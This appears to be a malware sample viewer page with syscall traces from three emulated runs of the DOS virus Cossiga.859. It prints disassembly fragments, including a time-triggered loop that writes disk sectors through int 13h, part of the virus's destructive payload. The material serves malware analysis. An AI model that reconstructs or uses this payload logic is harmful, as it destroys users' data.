Sample viewer

vx.netlux.org/Virus.DOS.Cossiga.859

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:46:32.905480602Z	26	PC: 12c3f \| Set disk transfer address
2018-12-17T22:46:32.907883Z	71	PC: 12c48 \| Get current directory
2018-12-17T22:46:32.91061078Z	59	PC: 12c54 \| Change current directory
2018-12-17T22:46:32.9144821Z	78	PC: 12c68 \| Find first file
2018-12-17T22:46:32.920774335Z	79	PC: 12c7d \| Find next file
2018-12-17T22:46:32.924515806Z	79	PC: 12c7d \| Find next file
2018-12-17T22:46:32.927284005Z	79	PC: 12c7d \| Find next file
2018-12-17T22:46:32.929671098Z	79	PC: 12c7d \| Find next file
2018-12-17T22:46:32.93305328Z	79	PC: 12c7d \| Find next file
2018-12-17T22:46:32.935671988Z	79	PC: 12c7d \| Find next file
2018-12-17T22:46:32.938185732Z	79	PC: 12c7d \| Find next file
2018-12-17T22:46:32.941310396Z	79	PC: 12c7d \| Find next file
2018-12-17T22:46:32.944490352Z	79	PC: 12c7d \| Find next file
2018-12-17T22:46:32.946953006Z	42	PC: 12c86 \| Get date 0x12c86: mov ax, si 0x12c88: and dl, al 0x12c8a: mov bp, dx 0x12c8c: and bp, 0xff 0x12c90: cmp bp, 0 0x12c93: je 0x12ca1 0x12c95: jmp 0x12c57 0x12c97: mov bp, 0 0x12c9a: mov dx, 0x3b0 0x12c9d: mov ah, 0x3b 0x12c9f: int 0x21 0x12ca1: mov si, 0 0x12ca4: mov cx, 0x20 0x12ca7: mov dx, 0x3e2 0x12caa: push bx 0x12cab: mov bh, 0x4e 0x12cad: mov ah, bh 0x12caf: pop bx 0x12cb0: int 0x21 0x12cb2: cmp ax, 0x12
2018-12-17T22:46:32.957922286Z	78	PC: 12cb2 \| Find first file
2018-12-17T22:46:32.963641813Z	79	PC: 12cc4 \| Find next file
2018-12-17T22:46:32.965741333Z	78	PC: 12cb2 \| Find first file
2018-12-17T22:46:32.977228794Z	61	PC: 12cd9 \| Open file (Filename = '�!�')
2018-12-17T22:46:32.984075115Z	66	PC: 12cf3 \| Move file pointer
2018-12-17T22:46:32.98539546Z	63	PC: 12cfd \| Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:46:32.992801292Z	62	PC: 12d1a \| Close file
2018-12-17T22:46:32.9953251Z	78	PC: 12cb2 \| Find first file
2018-12-17T22:46:33.001754116Z	79	PC: 12cc4 \| Find next file
2018-12-17T22:46:33.004453344Z	59	PC: 12e2d \| Change current directory
2018-12-17T22:46:33.009024183Z	59	PC: 12e34 \| Change current directory
2018-12-17T22:46:33.010739302Z	44	PC: 12e38 \| Get time 0x12e38: add cl, dh 0x12e3a: cmp cl, 0x3c 0x12e3d: je 0x12e46 0x12e3f: jmp 0x12e6f 0x12e41: nop 0x12e42: mov ah, 0x4c 0x12e44: int 0x21 0x12e46: push ds 0x12e47: push dx 0x12e48: xor cx, cx 0x12e4a: mov ds, cx 0x12e4c: mov ax, 0x309 0x12e4f: mov dx, 0x80 0x12e52: mov cl, 1 0x12e54: pushf 0x12e55: lcall ptr [0x4c] 0x12e59: inc ch 0x12e5b: cmp ch, 0x27 0x12e5e: jne 0x12e4c 0x12e60: pop dx
2018-12-17T22:46:33.012877811Z	9	PC: 12c22 \| Display string (Could not find end pointer)
2018-12-17T22:46:33.017191279Z	76	PC: 12c28 \| Terminate with return code (Return code = '0')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8922,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:22:11.557461161Z	26	PC: 12c3f \| Set disk transfer address
2018-12-25T12:22:11.558828998Z	71	PC: 12c48 \| Get current directory
2018-12-25T12:22:11.56262172Z	59	PC: 12c54 \| Change current directory
2018-12-25T12:22:11.566950889Z	78	PC: 12c68 \| Find first file
2018-12-25T12:22:11.579774925Z	79	PC: 12c7d \| Find next file
2018-12-25T12:22:11.583555287Z	79	PC: 12c7d \| Find next file (See above)
2018-12-25T12:22:11.586681077Z	79	PC: 12c7d \| Find next file (See above)
2018-12-25T12:22:11.589720523Z	79	PC: 12c7d \| Find next file (See above)
2018-12-25T12:22:11.595130594Z	79	PC: 12c7d \| Find next file (See above)
2018-12-25T12:22:11.598387206Z	79	PC: 12c7d \| Find next file (See above)
2018-12-25T12:22:11.601627249Z	79	PC: 12c7d \| Find next file (See above)
2018-12-25T12:22:11.605336391Z	79	PC: 12c7d \| Find next file (See above)
2018-12-25T12:22:11.608075149Z	79	PC: 12c7d \| Find next file (See above)
2018-12-25T12:22:11.610487952Z	42	PC: 12c86 \| Get date 0x12c86: mov ax, si 0x12c88: and dl, al 0x12c8a: mov bp, dx 0x12c8c: and bp, 0xff 0x12c90: cmp bp, 0 0x12c93: je 0x12ca1 0x12c95: jmp 0x12c57 0x12c97: mov bp, 0 0x12c9a: mov dx, 0x3b0 0x12c9d: mov ah, 0x3b 0x12c9f: int 0x21 0x12ca1: mov si, 0 0x12ca4: mov cx, 0x20 0x12ca7: mov dx, 0x3e2 0x12caa: push bx 0x12cab: mov bh, 0x4e 0x12cad: mov ah, bh 0x12caf: pop bx 0x12cb0: int 0x21 0x12cb2: cmp ax, 0x12
2018-12-25T12:22:11.613207414Z	78	PC: 12cb2 \| Find first file
2018-12-25T12:22:11.62128756Z	79	PC: 12cc4 \| Find next file
2018-12-25T12:22:11.625475477Z	78	PC: 12cb2 \| Find first file (See above)
2018-12-25T12:22:11.632382111Z	61	PC: 12cd9 \| Open file (Filename = '�!�')
2018-12-25T12:22:11.640294054Z	66	PC: 12cf3 \| Move file pointer
2018-12-25T12:22:11.642267698Z	63	PC: 12cfd \| Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:22:11.660319073Z	62	PC: 12d1a \| Close file
2018-12-25T12:22:11.66335725Z	78	PC: 12cb2 \| Find first file (See above)
2018-12-25T12:22:11.670225223Z	79	PC: 12cc4 \| Find next file (See above)
2018-12-25T12:22:11.672743583Z	59	PC: 12e2d \| Change current directory
2018-12-25T12:22:11.677917769Z	59	PC: 12e34 \| Change current directory
2018-12-25T12:22:11.68001505Z	44	PC: 12e38 \| Get time 0x12e38: add cl, dh 0x12e3a: cmp cl, 0x3c 0x12e3d: je 0x12e46 0x12e3f: jmp 0x12e6f 0x12e41: nop 0x12e42: mov ah, 0x4c 0x12e44: int 0x21 0x12e46: push ds 0x12e47: push dx 0x12e48: xor cx, cx 0x12e4a: mov ds, cx 0x12e4c: mov ax, 0x309 0x12e4f: mov dx, 0x80 0x12e52: mov cl, 1 0x12e54: pushf 0x12e55: lcall ptr [0x4c] 0x12e59: inc ch 0x12e5b: cmp ch, 0x27 0x12e5e: jne 0x12e4c 0x12e60: pop dx
2018-12-25T12:22:11.68253546Z	9	PC: 12c22 \| Display string (Could not find end pointer)
2018-12-25T12:22:11.688320373Z	76	PC: 12c28 \| Terminate with return code (Return code = '0')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":1,"Second":59,"TimeBased":true,"OriginalID":8922,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:22:11.621462487Z	26	PC: 12c3f \| Set disk transfer address
2018-12-25T12:22:11.622813008Z	71	PC: 12c48 \| Get current directory
2018-12-25T12:22:11.624870355Z	59	PC: 12c54 \| Change current directory
2018-12-25T12:22:11.627591166Z	78	PC: 12c68 \| Find first file
2018-12-25T12:22:11.635245163Z	79	PC: 12c7d \| Find next file
2018-12-25T12:22:11.638028354Z	79	PC: 12c7d \| Find next file (See above)
2018-12-25T12:22:11.640611263Z	79	PC: 12c7d \| Find next file (See above)
2018-12-25T12:22:11.643209118Z	79	PC: 12c7d \| Find next file (See above)
2018-12-25T12:22:11.646505955Z	79	PC: 12c7d \| Find next file (See above)
2018-12-25T12:22:11.649239813Z	79	PC: 12c7d \| Find next file (See above)
2018-12-25T12:22:11.651872023Z	79	PC: 12c7d \| Find next file (See above)
2018-12-25T12:22:11.660314099Z	79	PC: 12c7d \| Find next file (See above)
2018-12-25T12:22:11.66306173Z	79	PC: 12c7d \| Find next file (See above)
2018-12-25T12:22:11.665650683Z	42	PC: 12c86 \| Get date 0x12c86: mov ax, si 0x12c88: and dl, al 0x12c8a: mov bp, dx 0x12c8c: and bp, 0xff 0x12c90: cmp bp, 0 0x12c93: je 0x12ca1 0x12c95: jmp 0x12c57 0x12c97: mov bp, 0 0x12c9a: mov dx, 0x3b0 0x12c9d: mov ah, 0x3b 0x12c9f: int 0x21 0x12ca1: mov si, 0 0x12ca4: mov cx, 0x20 0x12ca7: mov dx, 0x3e2 0x12caa: push bx 0x12cab: mov bh, 0x4e 0x12cad: mov ah, bh 0x12caf: pop bx 0x12cb0: int 0x21 0x12cb2: cmp ax, 0x12
2018-12-25T12:22:11.669006032Z	78	PC: 12cb2 \| Find first file
2018-12-25T12:22:11.675448558Z	79	PC: 12cc4 \| Find next file
2018-12-25T12:22:11.678852089Z	78	PC: 12cb2 \| Find first file (See above)
2018-12-25T12:22:11.68602977Z	61	PC: 12cd9 \| Open file (Filename = '�!�')
2018-12-25T12:22:11.693665918Z	66	PC: 12cf3 \| Move file pointer
2018-12-25T12:22:11.697420712Z	63	PC: 12cfd \| Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:22:11.705399655Z	62	PC: 12d1a \| Close file
2018-12-25T12:22:11.707611871Z	78	PC: 12cb2 \| Find first file (See above)
2018-12-25T12:22:11.714212895Z	79	PC: 12cc4 \| Find next file (See above)
2018-12-25T12:22:11.716696254Z	59	PC: 12e2d \| Change current directory
2018-12-25T12:22:11.721622958Z	59	PC: 12e34 \| Change current directory
2018-12-25T12:22:11.723595801Z	44	PC: 12e38 \| Get time 0x12e38: add cl, dh 0x12e3a: cmp cl, 0x3c 0x12e3d: je 0x12e46 0x12e3f: jmp 0x12e6f 0x12e41: nop 0x12e42: mov ah, 0x4c 0x12e44: int 0x21 0x12e46: push ds 0x12e47: push dx 0x12e48: xor cx, cx 0x12e4a: mov ds, cx 0x12e4c: mov ax, 0x309 0x12e4f: mov dx, 0x80 0x12e52: mov cl, 1 0x12e54: pushf 0x12e55: lcall ptr [0x4c] 0x12e59: inc ch 0x12e5b: cmp ch, 0x27 0x12e5e: jne 0x12e4c 0x12e60: pop dx
2018-12-25T12:22:11.725945243Z	9	PC: 12c22 \| Display string (Could not find end pointer)
2018-12-25T12:22:11.730807204Z	76	PC: 12c28 \| Terminate with return code (Return code = '0')